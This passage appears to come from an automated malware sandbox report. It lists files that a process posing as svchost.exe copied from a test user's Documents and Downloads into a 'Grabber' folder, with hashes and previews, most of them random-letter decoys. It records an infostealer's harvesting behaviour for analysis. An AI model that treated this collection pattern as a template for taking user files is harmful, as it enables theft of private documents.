                                                  Encrypted:false
                                                  SSDEEP:24:RXklo22NBtmSOCPX4hQpKZCuvImjwxwo1:v22NBtxOCYQ0EuwmMxz
                                                  MD5:086908C2D2FAA8C9284EAB6D70682A47
                                                  SHA1:1BCA47E5FFEC5FD3CE416A922BC3F905C8FE27C4
                                                  SHA-256:40C76F418FBB2A515AF4DEC81E501CEB725FD4C916D50FCA1A82B9F5ABC1DCCF
                                                  SHA-512:02C48E3CDA1DC748CD3F30B2384D515B50C1DFD63651554AD3D4562B1A47F5446098DCED47A0766D184DDB30B3F158ABEC5877C9CA28AB191CEBB0782C26B230
                                                  Malicious:false
                                                  Preview:EIVQSAOTAQGMTJLIEKHIWADNDLJLEWUUXVGOFMOKPHABQUHVNBFVSKQIGVIHICGEEXRLSTKQNZUKOHPLLTCYQSLQJMPWPWNUJFUONDXMYCCUPDUBYMPUSUKUOWWSWDLZMDWKNMUKNPKBXAJATSGOQUAMHMZDCDDJRHKOUEDMLSCIOXAHAUFDQKBUBESAKMMFMHDLSSVUQLOZXARPGPMGAAKVDEITBYGGXWIGUIJRVXQOBOIOJWPYSPHZBHWQTMDCUFCWBQSAZNRUOPCLATAERLBPATETXMFUGXBEGMNPKKEZVSRLCYPFEPWIAEINAMGSOXLYWMUKYSQACPSUTGHDCTFLXKAMLOCGYHCMAETHVZNZOCWWUHYAPHFILDNLLBMLSLXIMOFGWTDVLWPHHRGGAWSIGNXEJRIBIBLWFBUASCLZPUIVDERXYLWTNLLRLTFZJTTDGFOEYPFXIPHFKEXHOGEHSFYCCCTGNFQFYETBADKAEAOXYXJWDJWNZPEOBJZTKPLJPPMICDOWUIVDKBQQMHETDORVKZPOWTAZRBAQYYQHBNHIWFZXBILGKHZBLSQJJEIYBHUIDAOEXERQEUMMKBWDXSMLJVAZJQPZARLOBNSTUDCVKLCVBPTKTJWSMPMKSFOQPINFTNEGPVSYCWOXABSGFFKRQDFQEIJWDUMZKILALUHYQZGZOLYMKSAOZGUYCKJOJLYINHVKCTZVXLYIYPGOQZQQAGXVWEBSURTQECDRXYKQAJBEKDNSIHNBZCUBIKPKVWLUOFFCIZSKQBAAPGFMBASMUOKLLGWEHHMYDJCOQEKOBYLYWOOZLBASOJJYLIHZKUGUKHZQBIAVUPYHYEWAYGUFNARHCUKTFMLHSFLRVAELAFCQHPEFUSGNONWLLYQVUVSVEKHDRXJHDSSFJATGDRCTMICJWPFPKKLXECKUXREXEAQNPOBPRKFYRWIWXEWLAPUSHGKXWYYIJNUMGQHBJPMOYZIXPGOJLOQG

                                                  C:\Users\user\AppData\Local\9493d1ccde8944e0fb5ffbe9b1372244\user@936905_en-CH\Grabber\DRIVE-C\Users\user\Documents\NVWZAPQSQL\EOWRVPQCCS.jpg

                                                  Download File
                                                  Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):4.692990330209164
                                                  Encrypted:false
                                                  SSDEEP:24:NCzz4hMQMxH70HULgnraTryj1S0KEX64u+O572j79DwzpnQf8A:axH70cauYS0k4u+O125wtnm8A
                                                  MD5:DD71B9C0322AD45992E56A9BCE43FE82
                                                  SHA1:60945B6BC3027451A2E1CFA29D263A994F50E91A
                                                  SHA-256:19AC62FD471E562088365029F7B0672623511CF3E58F2EF6DE1A15C14A2E94E7
                                                  SHA-512:86EA2B42FEB542977FCF534B4708F7A07E09F4ACC413307E660B905408BC4AA9E26C50E907FA02379EA3EBFD18C532CC9DC269B6EA5994E3290082E429CAAE03
                                                  Malicious:false
                                                  Preview:EOWRVPQCCSGUYRPSSKREBPXVQXUWKHGDIJHLBLYMXTIUESLNTSFMRJGDSQHOWECQAJMENKQNNWPVETUPWMXJTCUIAKPCZEENXVLTKYPKROZPDEBFNAJOVCNEXQJFUHQCMLNHGMRJJIPLOMWFWJKKXSTRHWFVLVQPEMFBLDTSCCSXADJIIDQIYCEGSDEDZDWUEJLTYJHMYEHHMBFZCRDHXZVPESWNDGUEFQZTJFSJVKZMWREMIZGAIZANQJKWWXITTXHDQDZOEOGKCEMDUUBDTMNWBRSOWEKQXQDCYJXERQRAMVQCWCTYJPEAJUAWNBRQWGFJAHXJJFRYTZMSGCREPRECKHXXMJGSQEKUCUNCWUAAPBWQVSMWCJGYSLPHJJHJGXSMNLNICJMSGSWRKARHMQXLYSAOPDAPXSMORZLUWYOQTJQNKSCAJWRUEYRFPNOVSMNYRKMTSGRIFLOAJUGJYDTLINOTCEADKRENVYNODFSIJGSDCICIDXZTLLSKKJQSOHYTZRBSHPHXWZOOSKQIRSGPTAOQPBVJAMXOGPYNJMJXAKCTMRRTFCBPOAMNJORWRNZOGZMNBVCCZYQPOQOUXBGKNLFSQWAWEREFQBRDLTVHEFNRUSOARHJPRECDRMPANZRBGCANIUWEBUDVWLYHFTPGBHSZBZBEFUWFHUZPJOVMHGSINZWDUKWPGMGSNSSJNOMETOCJILXRQRGZQFAJCWYQEENIZIMHRBTZUYEOKCQXYLWCKFHOHCOVRVPNTEUARVJEFALBUVYXIYZRMGJWZNYNLPYHZSSCODVXZBIWXIOAVMGMPKCPYIFZIKWRIHNIYASXZLMOLNZOMMYUSCRZBCXRANWWODLPHCXXDPLNYLMHYIUYZJWQLECFNXQEERYDVDBPXOLGZLZQCVYUYKFZGKXWVDQANPXQYAATYFJALGENVLDMHDASWKNNXODUHLXYGCBUKEFWISCCUWXNUNETWMTQHQDJMAXNPFPLMPQO

                                                  C:\Users\user\AppData\Local\9493d1ccde8944e0fb5ffbe9b1372244\user@936905_en-CH\Grabber\DRIVE-C\Users\user\Documents\NVWZAPQSQL\GRXZDKKVDB.xlsx

                                                  Download File
                                                  Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):4.697358951122591
                                                  Encrypted:false
                                                  SSDEEP:24:GllFjmGrUw8wsY1UbsUhBRShwdYjDuvHNeGXNei:WFewtsZZp8DkHzNL
                                                  MD5:244A1B624BD2C9C3A0D660425CB1F3C6
                                                  SHA1:FB6C19991CC49A27F0277F54D88B4522F479BE5F
                                                  SHA-256:E8C5EAACF4D2C4A65761719C311785A7873F0B25D849418ED86BBFE9D7F55C96
                                                  SHA-512:9875E6DE2ACC859CACC2873F537DDE6ED4EC8CA00CBA3D28535E0440D76FFD475B66C52B6217D311D301C4B9A097619CF29A26B2FD54D03CD27A20A17EC9CA31
                                                  Malicious:false
                                                  Preview:GRXZDKKVDBUGJWVAVQNLKHTVWJFMWUAIFGXJYDZTDDYOZYAHDDDHNXHNVSFVZJEMKSJXGDABHWXKQZCQXBMLFZCFZRGZPZWYYNETLMDWOLDLPIFOVKRDMQEWUEHKITHNGNRTRZWQHFMBDECTTQKFDEVNVHBAPCNMCJNWWITPVACWBIUNPCYFZKGJXCMBWDNHDCVDCGEKHYPPPEGKPCPMYZEKRCOGRHDFANVZFDZEKZWOKLRIOUPCTJCKQPECVEEGNTLJWZOKHSKZRNLJEDQLEQNRWIYLSXHSNVGFTCDJOFJSSGANZFCFSTDUPYBCCAPQWVVVHWQMAMBVDQNABQSQOSDYDMOVPXENCAXSTPDCENIQOWPCOQHPSISEOWFKMBLGAZRALPTAYHDZLKJTCHXGTPXNIVUMCOJRZXPUVUFPCWEAEZMMLATLTGHPJIMHWFBUWIATNBBPFGVFXNULJLRYLAGRNCKVAJADSLQGVLGIYOHDIWUERAQSCTFBMXCMLCXSHZGTWPBCVHUYPVAFSBZNBGAGMHGULJYULEEHPGNBGEQRAOPBXXMZIUIPJMFAOVNMZZTOZGOZOJPKWCEFTTAVUBAADATZYJDWSZEZPLDTGYCYWTSDQTIMZHCKMQLZFEYSYUUWFJSYEFNDDKQMZVTBOZLQBDKFHMMKIYQPFKZLTSHIJVNPHPCTWBWPTTKDHDZEMDVWXXBLPWLCSSBMTLIVOVYOKQCJKTYJWGJUBQUGQVBYJQQLLGTHWSPFLDMDWBTOQUISHXBCHIJKAJFIPBNKMWVQGUSJVNKXAXFDNOBYJXMWRDAZWUJSRMMFQXDPYYKOFBEROBQMDZHDZZHOEIOKDOCHQQDQQRHOROOIFAGQEJZJFZIGPJIRWVNQYZAJAHAWIEFFNXLXQWIUWYSGZDFYPCCGWYBBFQQMSMJBRIUPFBWIHWJWVCYOBNNXKIIWTIXOWRVLFBGPGWFQTGPUNWKWUUMQXIKNCLTTGYHBMKXJ

                                                  C:\Users\user\AppData\Local\9493d1ccde8944e0fb5ffbe9b1372244\user@936905_en-CH\Grabber\DRIVE-C\Users\user\Documents\NVWZAPQSQL\NVWZAPQSQL.docx

                                                  Download File
                                                  Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):4.6998645060098685
                                                  Encrypted:false
                                                  SSDEEP:24:FzrJLVfPTlXwAGfwXz0vRDC0aYECjYTixDXXwDyDFdJCSuHFF03T:FRLVHTlXwAGEoVCRYF0EDXgDVFHUj
                                                  MD5:1676F91570425F6566A5746BC8E8427E
                                                  SHA1:0F922133E2BEF0B48C623BEFA0C77361F6FA3900
                                                  SHA-256:534233540B43C2A72D09DBF93858ECD7B5F48376B69182EDBCA9983409F21C87
                                                  SHA-512:07D3CA8902964865FE9909054CF90DA1852678FBE58B1C0A8C2DBA2359A16DCBD43F23142D957DB9C1A8C2A1811EF4FEA74B0016A6F469538366B4FF01C8A146
                                                  Malicious:false
                                                  Preview:NVWZAPQSQLDLCZFLTMOWSKLFWOMMGYWWTZSPFFTDRHOTSSRKDGSJCIGMJJNKHMSAEMKBPGYCFVANNLUHHUMQOHINWJABNFIWWWZXJLCANQSKWMIWKPMVTCWFUMQBAGWZRWHRCMJDSNPGGGNECNQGPIZXLBIMLXMHDDXDKVYPEKRCNITDGJJNAEAATOVDDPBUDYWRPDYWARJTFXBUUZABBVURIWKONIVMPCYVUBTOTCIJJVRWYUNYHAFJZUMVTOIXZGAVVNSRENTVPHFLSLFWBLPFQDMQCJIHRXSQOTPSPDZKXCRBHZXDQIECBJTNIRGCACNADPHRWIVAWGPANEMHGPPPARWYWAOAHPWQLEGOBGVNWVBIFLAEOZYELRFOEZQCQIXCQBUKZGPOQFLHFLCFTYWBDGCWMDWICTICWVZEAQNJOOVCGQZYTBBXQPEYFQMSMETMKKZMRGXXLCDXDEEEJKZAUNEWZONYMVVIZOWQRUQYNOEFMWEVWXFAZRHGHUXGAYODAXDNQONZPVBKRYIOLZJIYSHJSCEPYVMYISKJIWPKVGUQBNLZCUFGXBFZDDRGUMCLJGJPDAZKZLRMDSBFEJQYNNKTHBMJMUHVUOIVZRULJFFYIUMOHUGCJUYZGXKXNIWZUKRIYDZATEOXGMHUPOOBIHEEVPKQEZDDWJHKEKLNTMWMDCFDOYCCDOERYFZNFUDEHYXIBQAVVOHQNIEWZODOFZDFJSWYCJMWWOIZSCZSZBGOIFHRDBXHKMCCLSYNVVXYLWKXEKVHIZEBIBHWMXDXEGZDYWRROMYHTDQVCLXOGVHWHFNIDZOXWTTPAMAKJIYLNQIEDSCCTSBLPHTTGLCIYXXWIBXAGYBACOKOTPPBKACWQBYRTKFMCSSRYQNESLPTLSLCWCSLHOGHNCGUFWMYXDBUFSOKFIDUIBHTQJFIQTVZZVIZEWTBSHJWKQXGUWLFKNDUSKPDSMJNJJNEEOWEHOKTNZWRDNOXWJEK

                                                  C:\Users\user\AppData\Local\9493d1ccde8944e0fb5ffbe9b1372244\user@936905_en-CH\Grabber\DRIVE-C\Users\user\Documents\NVWZAPQSQL\PALRGUCVEH.pdf

                                                  Download File
                                                  Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):4.696508269038202
                                                  Encrypted:false
                                                  SSDEEP:24:RSjVGe9uHEleifrd16Wa05tSl2jFQzpqPMXexMApqIjsp:2Ge9MQ/d16Wjtc2j64Phxjpq82
                                                  MD5:0E9E92228B27AD7E7B4449467A529B0C
                                                  SHA1:209F92CDFC879EE2B98DEF315CCE166AFEC00331
                                                  SHA-256:284937D0EBFEDD95B2347297D957320D8D5CA5FC48218296767069CABA6B14A6
                                                  SHA-512:CECA5F634268817B4A076414FFAB7D81F93EEC7E7D08B8691CCE0B2BCAF8FC694365455886E36983B4D8D758BC65BC1868BE8DB51AD41E082473726BB1FFD7B8
                                                  Malicious:false
                                                  Preview:PALRGUCVEHIRKBYGKJJWKNMNYKFUTLHCEDOTKTWJCZHNZMOUNMNREQTGFDNZTATQQPDFONRIRAZYJEPXQVIVWNBDQIMKULZMUINYTVUPNMQBQQYLGCAJYFEIWZTWGYTHEJPFBRNGCTANCYOISUQMRINVDUEIROITGPJZCCOVCZIZBHLYBDARSNRLEOQQDWOSMHXNRNBXNWMRVAQZUASARYHEITVTVSLHRGBYURPTEUNAUCYMZTXOZXKDXUEUUVTNGWGSBRAWIJZDVZDLMZBKEVESROLUEDPITQGUXFSRFAVNSESAFZLNXMXUYRFUEUKCMNFITMUQEWTCKEGDPOXHJSXBDLFIOLLHDYIVOQVEYJEZMDIOFXZFCPXJEQLPCSHKUGRQKXAUMKTHUMHWFQZRGBRZHGHYRXRODJXEBANQHOOVFBZXKJHDCAAKHZGSWGKGEDWOOCFCEYHPAQBYBKRXOTJWSCPMRDXNRYAQFQHSHOFCHWJDKTFHACROGLPZFWDCIBJSUTMTRHJKEGAHSBAQLDTWPTXBLVYYBNJBKDUNGOUDVWZOBKOJKSMZERYOYBNMDSYUPHFDPUXOMKCYNSEBJHJVXSWTIMBDLPWYMYMQKYICPQEWMYDUMYJRSVQHDEELUFOEQYUIZBTNUNJNZQTDTIJKNOJNFJDDGEYVGDXTQINCQDGJRRPOBRUHQLMKFJSSNNCQMDHWQYMHWIBVNPHRQCBTMYBSOJYXCUAYTWUDETCJTTEQSPXKTRSQBDJYENXLXJTQIYOZHEFAQOFBXKATTASAWEYGDPTTLZDAFVKRYLRNFSWZYBGUMRHHMNPVCVECBEVWEXNMSCXSGJRAQKAYEIULWHXXFKTJWPDMYUAOSFBKCTNCTQQXTLXIIJKYOPYBMSFGYLZDGOXTVIHYLUMJCRDRQXFLBDAUXBTNAPMACHVQILKZSQLNPPJVGXAXUMTOUMJJJYJSPJALITYYHOOMVVOQNOSSPBLMRBWWPYXB

                                                  C:\Users\user\AppData\Local\9493d1ccde8944e0fb5ffbe9b1372244\user@936905_en-CH\Grabber\DRIVE-C\Users\user\Documents\PALRGUCVEH.pdf

                                                  Download File
                                                  Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):4.696508269038202
                                                  Encrypted:false
                                                  SSDEEP:24:RSjVGe9uHEleifrd16Wa05tSl2jFQzpqPMXexMApqIjsp:2Ge9MQ/d16Wjtc2j64Phxjpq82
                                                  MD5:0E9E92228B27AD7E7B4449467A529B0C
                                                  SHA1:209F92CDFC879EE2B98DEF315CCE166AFEC00331
                                                  SHA-256:284937D0EBFEDD95B2347297D957320D8D5CA5FC48218296767069CABA6B14A6
                                                  SHA-512:CECA5F634268817B4A076414FFAB7D81F93EEC7E7D08B8691CCE0B2BCAF8FC694365455886E36983B4D8D758BC65BC1868BE8DB51AD41E082473726BB1FFD7B8
                                                  Malicious:false
                                                  Preview:PALRGUCVEHIRKBYGKJJWKNMNYKFUTLHCEDOTKTWJCZHNZMOUNMNREQTGFDNZTATQQPDFONRIRAZYJEPXQVIVWNBDQIMKULZMUINYTVUPNMQBQQYLGCAJYFEIWZTWGYTHEJPFBRNGCTANCYOISUQMRINVDUEIROITGPJZCCOVCZIZBHLYBDARSNRLEOQQDWOSMHXNRNBXNWMRVAQZUASARYHEITVTVSLHRGBYURPTEUNAUCYMZTXOZXKDXUEUUVTNGWGSBRAWIJZDVZDLMZBKEVESROLUEDPITQGUXFSRFAVNSESAFZLNXMXUYRFUEUKCMNFITMUQEWTCKEGDPOXHJSXBDLFIOLLHDYIVOQVEYJEZMDIOFXZFCPXJEQLPCSHKUGRQKXAUMKTHUMHWFQZRGBRZHGHYRXRODJXEBANQHOOVFBZXKJHDCAAKHZGSWGKGEDWOOCFCEYHPAQBYBKRXOTJWSCPMRDXNRYAQFQHSHOFCHWJDKTFHACROGLPZFWDCIBJSUTMTRHJKEGAHSBAQLDTWPTXBLVYYBNJBKDUNGOUDVWZOBKOJKSMZERYOYBNMDSYUPHFDPUXOMKCYNSEBJHJVXSWTIMBDLPWYMYMQKYICPQEWMYDUMYJRSVQHDEELUFOEQYUIZBTNUNJNZQTDTIJKNOJNFJDDGEYVGDXTQINCQDGJRRPOBRUHQLMKFJSSNNCQMDHWQYMHWIBVNPHRQCBTMYBSOJYXCUAYTWUDETCJTTEQSPXKTRSQBDJYENXLXJTQIYOZHEFAQOFBXKATTASAWEYGDPTTLZDAFVKRYLRNFSWZYBGUMRHHMNPVCVECBEVWEXNMSCXSGJRAQKAYEIULWHXXFKTJWPDMYUAOSFBKCTNCTQQXTLXIIJKYOPYBMSFGYLZDGOXTVIHYLUMJCRDRQXFLBDAUXBTNAPMACHVQILKZSQLNPPJVGXAXUMTOUMJJJYJSPJALITYYHOOMVVOQNOSSPBLMRBWWPYXB

                                                  C:\Users\user\AppData\Local\9493d1ccde8944e0fb5ffbe9b1372244\user@936905_en-CH\Grabber\DRIVE-C\Users\user\Documents\PALRGUCVEH.xlsx

                                                  Download File
                                                  Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):4.696508269038202
                                                  Encrypted:false
                                                  SSDEEP:24:RSjVGe9uHEleifrd16Wa05tSl2jFQzpqPMXexMApqIjsp:2Ge9MQ/d16Wjtc2j64Phxjpq82
                                                  MD5:0E9E92228B27AD7E7B4449467A529B0C
                                                  SHA1:209F92CDFC879EE2B98DEF315CCE166AFEC00331
                                                  SHA-256:284937D0EBFEDD95B2347297D957320D8D5CA5FC48218296767069CABA6B14A6
                                                  SHA-512:CECA5F634268817B4A076414FFAB7D81F93EEC7E7D08B8691CCE0B2BCAF8FC694365455886E36983B4D8D758BC65BC1868BE8DB51AD41E082473726BB1FFD7B8
                                                  Malicious:false
                                                  Preview:PALRGUCVEHIRKBYGKJJWKNMNYKFUTLHCEDOTKTWJCZHNZMOUNMNREQTGFDNZTATQQPDFONRIRAZYJEPXQVIVWNBDQIMKULZMUINYTVUPNMQBQQYLGCAJYFEIWZTWGYTHEJPFBRNGCTANCYOISUQMRINVDUEIROITGPJZCCOVCZIZBHLYBDARSNRLEOQQDWOSMHXNRNBXNWMRVAQZUASARYHEITVTVSLHRGBYURPTEUNAUCYMZTXOZXKDXUEUUVTNGWGSBRAWIJZDVZDLMZBKEVESROLUEDPITQGUXFSRFAVNSESAFZLNXMXUYRFUEUKCMNFITMUQEWTCKEGDPOXHJSXBDLFIOLLHDYIVOQVEYJEZMDIOFXZFCPXJEQLPCSHKUGRQKXAUMKTHUMHWFQZRGBRZHGHYRXRODJXEBANQHOOVFBZXKJHDCAAKHZGSWGKGEDWOOCFCEYHPAQBYBKRXOTJWSCPMRDXNRYAQFQHSHOFCHWJDKTFHACROGLPZFWDCIBJSUTMTRHJKEGAHSBAQLDTWPTXBLVYYBNJBKDUNGOUDVWZOBKOJKSMZERYOYBNMDSYUPHFDPUXOMKCYNSEBJHJVXSWTIMBDLPWYMYMQKYICPQEWMYDUMYJRSVQHDEELUFOEQYUIZBTNUNJNZQTDTIJKNOJNFJDDGEYVGDXTQINCQDGJRRPOBRUHQLMKFJSSNNCQMDHWQYMHWIBVNPHRQCBTMYBSOJYXCUAYTWUDETCJTTEQSPXKTRSQBDJYENXLXJTQIYOZHEFAQOFBXKATTASAWEYGDPTTLZDAFVKRYLRNFSWZYBGUMRHHMNPVCVECBEVWEXNMSCXSGJRAQKAYEIULWHXXFKTJWPDMYUAOSFBKCTNCTQQXTLXIIJKYOPYBMSFGYLZDGOXTVIHYLUMJCRDRQXFLBDAUXBTNAPMACHVQILKZSQLNPPJVGXAXUMTOUMJJJYJSPJALITYYHOOMVVOQNOSSPBLMRBWWPYXB

                                                  C:\Users\user\AppData\Local\9493d1ccde8944e0fb5ffbe9b1372244\user@936905_en-CH\Grabber\DRIVE-C\Users\user\Documents\ZGGKNSUKOP.pdf

                                                  Download File
                                                  Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):4.6959554225029665
                                                  Encrypted:false
                                                  SSDEEP:24:TifvYKkubZMu3HGRW2lJUao1nH5o4WGAZ46:rKkmZMuklJUj+GAZ46
                                                  MD5:DCABA2748DFEAEF0BFBC56FD9F79315C
                                                  SHA1:B87FBA690A774893B22B9F611DFDCB5CDC520269
                                                  SHA-256:86DF5957E0CD2EBDFC2FF8C2F05569BA71462149042DF57ECE5E8228E3BC5DDD
                                                  SHA-512:65F10692D0AE5CBAADDB03E89D6CD1D3486429906437A17C2B1157BEDB069202B1DC52A4E864AA8F90B8CBD171FD2A3E150185BF7DFF81540E209B6A8F8829F3
                                                  Malicious:false
                                                  Preview:ZGGKNSUKOPMPPNHVZHJQGVEFQIYKECDTBUUNZDYNGQNIRYRWHUTXXPSHQTZPTZVHQXNNQJMVUKUOXVGORIAYJGXFFBGSTKCIJZKEQXQQIVFFMJLOMJSXIEOLRGDCSILZBJCYZNNVATINEQDJPDYKYEGAQWQMEKFVPOYVPNSSIUTCUVWRTSGVMOYKONZJJHVYYHDVZQPBVLAEYYFULQVIAJCQYCDCEGDPRRLXXZXFIPXZYSZYOHEAPCISCQQIAXVPAQUVHGATHPNBNNZVCLFBZBDBZXOQODZLPUONDHVUIQLSZFYHOZHZHEGULYTEVGGLQVDEJVLJEVPQFWMTICLCXTQWMOFFAXIMODRSEVRDYZWTZFYKVZAJEAQBNILURHKTJBNMYKYFSYGEEBYTRKZAHNYHNKUVIQXUDTDSCKKVFAHEOCHUYENGZNJLYIKKSHPNCIQVEDXXJBQWLPTRWDPYUIEDKEYQXNAFVHZZHVLORWXSFDRTMIHTRSJAHAAHMDOMCQGDKDFHBNGVZQTTCSWSPIHCTQXSLLYZTFMEMACZONDWHGUSVOCWSBRSQZPAKSJHSWPMXYNSVNZCBVQSSDMAXHBCCABCBJMXUBBMSGLUNDNJSGZUMDVFIJNOELGIFULZKPJDVNZQPDOWCXYQGTVJKDHOFHYVKNSZDNMILUISTCTZRFSEWRMDZLOBGFMXNVDCJYYLJUDJGSTSUEEGOSENKRNGXAGHHNOGGDSDRGIFROBPWJOCJPXDATRXEPUOWMBLLOQTSWYHGAJBORDMNUEAHWTKUYXIIPMYCMRMTPBVKTCXSHVYJOWCUSTTUMTZOYSOSDSUBSGMLOTYCZCTXANUCXZOADEOEJYBCLEULBLYXGMGORWYBNIGNRUWJATDKWTNSTJBVFQENEPZJCVWRRMXFFHEBPBGQZTDBCCMCQDYUYICLUZKGYRMAVIURGHOINFOGSJSSMACWITEPVYEMKEJTPCQQMYWOBTBOCHUSNOE

                                                  C:\Users\user\AppData\Local\9493d1ccde8944e0fb5ffbe9b1372244\user@936905_en-CH\Grabber\DRIVE-C\Users\user\Documents\desktop.ini

                                                  Download File
                                                  Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):402
                                                  Entropy (8bit):3.493087299556618
                                                  Encrypted:false
                                                  SSDEEP:12:QZsiL5wmHOlDmo0qmUclLwr2FlDmo0IWF9klrgl2FlDmo0qjKAev:QCGwv4o0hlLwiF4o0UUsF4o01AM
                                                  MD5:ECF88F261853FE08D58E2E903220DA14
                                                  SHA1:F72807A9E081906654AE196605E681D5938A2E6C
                                                  SHA-256:CAFEC240D998E4B6E92AD1329CD417E8E9CBD73157488889FD93A542DE4A4844
                                                  SHA-512:82C1C3DD163FBF7111C7EF5043B009DAFC320C0C5E088DEC16C835352C5FFB7D03C5829F65A9FF1DC357BAE97E8D2F9C3FC1E531FE193E84811FB8C62888A36B
                                                  Malicious:false
                                                  Preview:......[...S.h.e.l.l.C.l.a.s.s.I.n.f.o.].....L.o.c.a.l.i.z.e.d.R.e.s.o.u.r.c.e.N.a.m.e.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.7.0.....I.c.o.n.R.e.s.o.u.r.c.e.=.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.i.m.a.g.e.r.e.s...d.l.l.,.-.1.1.2.....I.c.o.n.F.i.l.e.=.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.....I.c.o.n.I.n.d.e.x.=.-.2.3.5.....

                                                  C:\Users\user\AppData\Local\9493d1ccde8944e0fb5ffbe9b1372244\user@936905_en-CH\Grabber\DRIVE-C\Users\user\Downloads\BJZFPPWAPT.png

                                                  Download File
                                                  Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):4.704346314649071
                                                  Encrypted:false
                                                  SSDEEP:24:XPzUwxdkbbeZScSZIv3ZoJNWhjcfzkabZsHx:fzUwx4bK+W/+fzuR
                                                  MD5:8B66CD8FCBCEB253D75DB5CDE6291FA2
                                                  SHA1:6CE0386190B9753849299B268AA7B8D15F9F72E2
                                                  SHA-256:51AD0E037F53D8EEDFEBC58112BDFA30796A0A56FBD31B65384B41896489BDB4
                                                  SHA-512:7C46027769E82ACD4E3ACB038FB80E34792E81B0527AE318194FE22BD066699A86E9B3E55AC5A1BCAC005FE0E8B7FB70B041656DF78BF84983A97CEDAA8861DC
                                                  Malicious:false
                                                  Preview:BJZFPPWAPTZISGUNDSDXEATFCUXAGEFCTTZKBNFYFVKDZEMPHZAJNCAVKZWYYNTVOWAJJLGAAUTHJTXJTGQLSVTGXPQIMVSAZAKJXHFSFGEVOJUYTICTQZLJZDQYBUBYFSZSBIOBVSAJCHKIQYCAYMMOZZQCCHGYUFOUMXHXCPNMUMVVZRXZCGPDXYDBBMVMWVPHNHLTQKLDBALGGHIVJYUKXJWAFDLMMQQUEQFWPXRQQODUGQSALTDJTROBSIRXEJYUMIWWHBCANDJZNUJGIKFXUWXKPWKATRJSISRBLFZRNYVGGJJMECDAMBUVQBAZGLVITWWCNZFHKZSKXZCMBCAKDDJCKKLPSOZVUJSWOYBBVEUPDSCKJRFEYGLDGCUHDWDNXCLOHDPVAIFYDTEOJCHJMFFBYBQICVVKCFBQZTCRCDMDLPWOJNYPCOZSCAPIZTHRAONKKSINEYBBWDVGRURGHBALLNKTXIGFWNKLQZPCTSMBRQYVMGXEIBGKILOUERUQSZIKLJQNKDPZJVSDIANCPNMTCRACOINNDAMOQOPAIVLAVJQWKZFANIEXSROWVPTCRRWMWEOIFZXRTNMYBGRZIKPJCTJYJQFKGVOKPTJYXUDCYYOIPMURGGXZGVLUDYKKODERMFIEIWKVSJARDMDMBGKRQHSUCNHMIFNOOKAZIJQSDSIGSBRMCBLXMKFSZZUAJROFXWXYRGSBMDTXFEMBZEMCYBLNRDJBWBOCUMLSOLNUPTETGCYWROACYQSFXBWNHGWPJVQNWAWKUVISCLHXAODXHGTGYBIVDGQQULRMEJMCYHRYXYWXLQTNEIINUCYEPKOEPHTQOQWVAZSBUDRHGYAFVQYNMYCERIVKOVOQNJLBIXTRBDBHNTZPWPYCVFUNIEAVJGCCWWHQQNTFCFYJDTKIZERPJVHSNNBWBOTMBMGRTKDWRLWPSEQAWSWDOFSPSEHOQRGFTQGBAGLJEZFNAHFMRNONCLEXLHXV

                                                  C:\Users\user\AppData\Local\9493d1ccde8944e0fb5ffbe9b1372244\user@936905_en-CH\Grabber\DRIVE-C\Users\user\Downloads\EEGWXUHVUG.docx

                                                  Download File
                                                  Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):4.690299109915258
                                                  Encrypted:false
                                                  SSDEEP:24:0C2jKPS/GeHBPaNDdBKW/PXAx+sTTqBVw8tk7LI/csnfv:UWKPaNjKW/PwxfTixkY/cSfv
                                                  MD5:F0D9DE697149ECBC1D88C7EA4841E5BD
                                                  SHA1:06A2A47C12B3554397AA0C8F483411CAB366947D
                                                  SHA-256:5BE0708B77E41FC490ECEC9CDFF20C9479FC857E47CC276D6F68C0895EA68FB2
                                                  SHA-512:E9953E00241C3FB48E267F1A49E2C53FEE4240415C7A48FAD089742C6C4AA1C5A9CCFEE616FC91EB29C1C8252A3095163A515ABA96A1F0B41A8B129929696917
                                                  Malicious:false
